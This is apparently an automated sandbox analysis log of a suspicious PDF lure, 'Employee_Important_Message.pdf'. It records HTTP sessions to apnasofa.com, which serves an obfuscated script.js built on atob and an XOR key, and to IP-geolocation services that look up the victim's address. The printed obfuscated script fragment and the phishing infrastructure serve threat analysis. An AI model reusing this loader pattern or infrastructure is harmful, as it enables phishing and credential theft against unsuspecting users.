                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        2024-11-29 13:30:07 UTC302INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 76 61 72 20 73 63 72 69 70 74 20 3d 20 61 74 6f 62 28 22 46 77 6f 41 42 77 67 52 42 52 46 58 45 67 45 48 4e 78 4d 52 42 52 45 31 47 68 59 58 46 77 73 52 47 55 31 65 4e 79 6f 75 4d 51 6f 61 48 77 41 58 42 79 6b 4d 45 77 45 52 44 30 4a 56 55 30 31 4b 55 6c 68 4b 53 78 35 7a 55 30 55 50 46 78 46 55 43 68 41 4e 48 41 49 52 45 77 63 57 44 67 45 38 48 67 51 4b 48 6b 56 4a 53 30 4a 65 53 47 39 44 55 67 59 62 42 52 59 4e 55 77 77 51 50 77 6f 57 41 67 6b 63 55 31 68 44 58 51 77 6b 41 77 6f 58 46 68 6b 4b 49 67 51 51 46 77 77 70 48 41 45 66 4d 77 73 51 47 51 6f 51 46 30 6f 4b 58 42 45 52 47 42 46 52 48 51 51 56 47 77 49 56 48 77 6f 4c 58 52 41 51 46 78 63 31 44 41 41 58 42 30 78 59 65 47 39 55 53
                                                        Data Ascii: var key = "secretkey";var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US
                                                        2024-11-29 13:30:07 UTC8529INData Raw: 42 41 74 5a 46 41 41 58 4e 77 67 56 41 67 6b 2f 41 51 6f 4f 4a 7a 63 34 51 30 78 5a 43 47 39 44 55 6b 56 55 53 30 55 61 48 41 73 51 42 6b 55 63 43 68 59 52 55 31 68 44 42 51 77 61 44 77 6f 4f 58 51 6b 4d 45 51 51 41 41 67 6f 58 58 51 30 43 41 51 31 61 47 42 41 62 41 42 45 52 47 77 73 54 51 31 52 51 53 47 39 44 55 6b 56 55 53 30 55 51 46 55 56 4c 55 77 30 56 47 41 31 51 55 78 63 47 42 68 41 47 42 55 56 65 56 46 35 70 55 6b 56 55 53 30 56 5a 42 78 63 61 55 68 35 2b 53 30 56 5a 55 30 56 44 55 6b 56 55 53 78 63 63 42 78 41 52 48 45 55 56 48 77 6f 62 57 77 30 43 41 51 31 64 55 47 39 5a 55 30 56 44 55 6b 55 4a 53 77 59 59 42 77 59 4c 55 6b 30 52 51 6b 55 43 65 55 56 44 55 6b 56 55 53 30 56 5a 55 30 55 52 46 78 45 42 47 51 74 5a 56 45 4a 59 65 45 56 55 53 30 56
                                                        Data Ascii: BAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0V


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.1649728104.26.12.2054436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:08 UTC547OUTGET /?format=json HTTP/1.1
                                                        Host: api.ipify.org
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Origin: https://apnasofa.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://apnasofa.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:30:09 UTC463INHTTP/1.1 200 OK
                                                        Date: Fri, 29 Nov 2024 13:30:09 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 21
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 8ea2f35f1e24de96-EWR
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1912&min_rtt=1744&rtt_var=774&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1125&delivery_rate=1674311&cwnd=201&unsent_bytes=0&cid=5cf3aba5f2bea695&ts=462&x=0"
                                                        2024-11-29 13:30:09 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                        Data Ascii: {"ip":"8.46.123.228"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.1649726103.160.107.1384436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:09 UTC353OUTGET /episode/script.js HTTP/1.1
                                                        Host: apnasofa.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:30:10 UTC1066INHTTP/1.1 200 OK
                                                        Connection: close
                                                        cache-control: public, max-age=2592000
                                                        expires: Sun, 29 Dec 2024 13:30:10 GMT
                                                        content-type: text/javascript
                                                        last-modified: Thu, 28 Nov 2024 14:11:15 GMT
                                                        accept-ranges: bytes
                                                        content-length: 8831
                                                        date: Fri, 29 Nov 2024 13:30:10 GMT
                                                        server: LiteSpeed
                                                        x-xss-protection: 1; mode=block
                                                        x-frame-options: SAMEORIGIN
                                                        x-content-type-options: nosniff
                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                        referrer-policy: strict-origin-when-cross-origin
                                                        permissions-policy: geolocation=self
                                                        content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                        x-permitted-cross-domain-policies: none
                                                        feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                        access-control-allow-origin: *
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        2024-11-29 13:30:10 UTC302INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 76 61 72 20 73 63 72 69 70 74 20 3d 20 61 74 6f 62 28 22 46 77 6f 41 42 77 67 52 42 52 46 58 45 67 45 48 4e 78 4d 52 42 52 45 31 47 68 59 58 46 77 73 52 47 55 31 65 4e 79 6f 75 4d 51 6f 61 48 77 41 58 42 79 6b 4d 45 77 45 52 44 30 4a 56 55 30 31 4b 55 6c 68 4b 53 78 35 7a 55 30 55 50 46 78 46 55 43 68 41 4e 48 41 49 52 45 77 63 57 44 67 45 38 48 67 51 4b 48 6b 56 4a 53 30 4a 65 53 47 39 44 55 67 59 62 42 52 59 4e 55 77 77 51 50 77 6f 57 41 67 6b 63 55 31 68 44 58 51 77 6b 41 77 6f 58 46 68 6b 4b 49 67 51 51 46 77 77 70 48 41 45 66 4d 77 73 51 47 51 6f 51 46 30 6f 4b 58 42 45 52 47 42 46 52 48 51 51 56 47 77 49 56 48 77 6f 4c 58 52 41 51 46 78 63 31 44 41 41 58 42 30 78 59 65 47 39 55 53
                                                        Data Ascii: var key = "secretkey";var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US
                                                        2024-11-29 13:30:10 UTC8529INData Raw: 42 41 74 5a 46 41 41 58 4e 77 67 56 41 67 6b 2f 41 51 6f 4f 4a 7a 63 34 51 30 78 5a 43 47 39 44 55 6b 56 55 53 30 55 61 48 41 73 51 42 6b 55 63 43 68 59 52 55 31 68 44 42 51 77 61 44 77 6f 4f 58 51 6b 4d 45 51 51 41 41 67 6f 58 58 51 30 43 41 51 31 61 47 42 41 62 41 42 45 52 47 77 73 54 51 31 52 51 53 47 39 44 55 6b 56 55 53 30 55 51 46 55 56 4c 55 77 30 56 47 41 31 51 55 78 63 47 42 68 41 47 42 55 56 65 56 46 35 70 55 6b 56 55 53 30 56 5a 42 78 63 61 55 68 35 2b 53 30 56 5a 55 30 56 44 55 6b 56 55 53 78 63 63 42 78 41 52 48 45 55 56 48 77 6f 62 57 77 30 43 41 51 31 64 55 47 39 5a 55 30 56 44 55 6b 55 4a 53 77 59 59 42 77 59 4c 55 6b 30 52 51 6b 55 43 65 55 56 44 55 6b 56 55 53 30 56 5a 55 30 55 52 46 78 45 42 47 51 74 5a 56 45 4a 59 65 45 56 55 53 30 56
                                                        Data Ascii: BAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0V


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.1649730103.160.107.1384436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:09 UTC358OUTGET /episode/image/logo.png HTTP/1.1
                                                        Host: apnasofa.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:30:10 UTC1030INHTTP/1.1 200 OK
                                                        Connection: close
                                                        cache-control: public, max-age=31536000
                                                        expires: Sat, 29 Nov 2025 13:30:10 GMT
                                                        content-type: image/png
                                                        last-modified: Thu, 28 Nov 2024 06:32:18 GMT
                                                        accept-ranges: bytes
                                                        content-length: 21327
                                                        date: Fri, 29 Nov 2024 13:30:10 GMT
                                                        server: LiteSpeed
                                                        x-xss-protection: 1; mode=block
                                                        x-frame-options: SAMEORIGIN
                                                        x-content-type-options: nosniff
                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                        referrer-policy: strict-origin-when-cross-origin
                                                        permissions-policy: geolocation=self
                                                        content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                        x-permitted-cross-domain-policies: none
                                                        feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        2024-11-29 13:30:10 UTC338INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 4f 00 00 01 34 08 06 00 00 00 44 9d 7b b3 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 52 dc 49 44 41 54 78 da ec dd 4b 72 1b 49 da 20 5a af b2 1c 37 d5 2b 20 ea 6e 80 ac 15 10 39 e9 1e 92 35 6f 33 22 57 20 a6 71 01 82 16 40 4b e6 0a 14 32 eb 79 51 c3 be 93 04 57 50 e4 06 ba c0 15 94 78 37 f0 df 70 d0 91 82 28 3e 40 12 08 77 8f 38 c7 2c 0c 59 59 29 21 e0 8f 08 77 ff fc 11 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 7f 79 ea ff fc ff 8e fe 9f f3 f6 63 5f 32 f1 52 ff ed e2 ff 8e 5f f3 e7 3e fc bf 61 d2 7e 4c a4 20 af d0
                                                        Data Ascii: PNGIHDRO4D{pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<RIDATxKrI Z7+ n95o3"W q@K2yQWPx7p(>@w8,YY)!w7yc_2R_>a~L
                                                        2024-11-29 13:30:10 UTC14994INData Raw: 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00 00 00 00 00 82 e0 29 00 00 00 00 00 00 c0 82 e0 29 00 00 00 00 00 00 40 10 3c 05 00 00 00 00 00 00 58 10 3c 05 00 00 00 00 00 00 08 82 a7 00 00 00 00 00 00 00 0b 82 a7 00 00 00 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00
                                                        Data Ascii: A`A ,SS x xOO))@<X<A`A ,SS x xOO
                                                        2024-11-29 13:30:10 UTC5995INData Raw: dd 7a 7f 92 b3 bc a4 5d b1 e8 a6 4d f6 ae 84 67 c4 3a 79 2e 78 0a 00 6f d7 b7 40 e3 6d 30 b8 43 47 d2 39 76 a5 0c 82 37 72 84 02 95 f0 3c de 4b b3 c1 87 62 2a df 8b 7e 6f 7c ed c1 f3 7a 56 c0 3d c4 01 d8 21 4d 8c 98 a8 d7 14 cc f1 11 f4 c6 40 ce 8d cf d9 87 9d f6 6d f2 53 9a e0 74 38 f0 76 d9 90 9c 84 bc ab 8c d7 ce 73 c1 53 00 78 a3 b4 fd d6 75 8f 7e d2 85 ad 02 e9 ba cc 15 72 1f 07 6d c7 ed 44 76 a0 7e 3c 68 10 3b 12 a4 55 a7 07 99 6f e3 da ec f7 67 35 ea f5 46 0c 62 f5 69 1a 94 cd fd 7e bf 4d 13 c6 e0 21 82 a7 f4 49 15 db 71 be 45 e6 1d c8 76 43 ff 26 3f 4d b5 cb 86 a1 90 36 d9 da 79 2e 78 0a 00 9b 71 ee b7 40 2f 3a 2b 53 db f7 52 92 34 41 e7 a6 80 5b 89 67 9f 4e 07 90 e4 25 fc c6 46 c9 af a6 5e bc f6 fe 73 9e 97 b6 6a 28 67 7e 4f 43 fe 15 0e 06 66 79
                                                        Data Ascii: z]Mg:y.xo@m0CG9v7r<Kb*~o|zV=!M@mSt8vsSxu~rmDv~<h;Uog5Fbi~M!IqEvC&?M6y.xq@/:+SR4A[gN%F^sj(g~OCfy


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.1649729103.160.107.1384436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:09 UTC593OUTGET /favicon.ico HTTP/1.1
                                                        Host: apnasofa.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://apnasofa.com/episode/index
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:30:10 UTC416INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 1251
                                                        date: Fri, 29 Nov 2024 13:30:10 GMT
                                                        server: LiteSpeed
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        2024-11-29 13:30:10 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                        2024-11-29 13:30:10 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                        Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.1649731172.67.74.1524436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:10 UTC349OUTGET /?format=json HTTP/1.1
                                                        Host: api.ipify.org
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:30:11 UTC430INHTTP/1.1 200 OK
                                                        Date: Fri, 29 Nov 2024 13:30:10 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 21
                                                        Connection: close
                                                        Vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 8ea2f36a6a434398-EWR
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1714&rtt_var=657&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=927&delivery_rate=1703617&cwnd=230&unsent_bytes=0&cid=40fe909a5285ddfc&ts=463&x=0"
                                                        2024-11-29 13:30:11 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                        Data Ascii: {"ip":"8.46.123.228"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.1649732103.126.138.874436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:12 UTC550OUTGET /json/8.46.123.228 HTTP/1.1
                                                        Host: ipwhois.app
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Origin: https://apnasofa.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://apnasofa.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:30:12 UTC255INHTTP/1.1 200 OK
                                                        Date: Fri, 29 Nov 2024 13:30:12 GMT
                                                        Content-Type: application/json; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Server: ipwhois
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Headers: *
                                                        X-Robots-Tag: noindex
                                                        2024-11-29 13:30:12 UTC69INData Raw: 33 61 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 2c 22 6d 65 73 73 61 67 65 22 3a 22 79 6f 75 27 76 65 20 68 69 74 20 74 68 65 20 6d 6f 6e 74 68 6c 79 20 6c 69 6d 69 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 3a{"success":false,"message":"you've hit the monthly limit"}0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.1649733103.126.138.874436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:14 UTC352OUTGET /json/8.46.123.228 HTTP/1.1
                                                        Host: ipwhois.app
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:30:15 UTC255INHTTP/1.1 200 OK
                                                        Date: Fri, 29 Nov 2024 13:30:15 GMT
                                                        Content-Type: application/json; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Server: ipwhois
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Headers: *
                                                        X-Robots-Tag: noindex
                                                        2024-11-29 13:30:15 UTC699INData Raw: 32 61 66 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 66 6c 61 67 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 69 70 77 68 6f 69 73 2e 69 6f 5c 2f 66 6c 61 67 73 5c 2f 75 73 2e 73 76 67 22 2c 22 63 6f 75 6e 74 72 79 5f 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 63 6f 75 6e 74 72 79 5f 70 68
                                                        Data Ascii: 2af{"ip":"8.46.123.228","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","country_flag":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","country_capital":"Washington D.C.","country_ph


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:08:29:45
                                                        Start date:29/11/2024
                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Important_Message.pdf"
                                                        Imagebase:0x7ff7ea450000
                                                        File size:5'641'176 bytes
                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:2
                                                        Start time:08:29:46
                                                        Start date:29/11/2024
                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                        Imagebase:0x7ff7f3750000
                                                        File size:3'581'912 bytes
                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:3
                                                        Start time:08:29:46
                                                        Start date:29/11/2024
                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1620 --field-trial-handle=1548,i,4707952982078980515,2940567251321136579,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                        Imagebase:0x7ff7f3750000
                                                        File size:3'581'912 bytes
                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:4
                                                        Start time:08:29:47
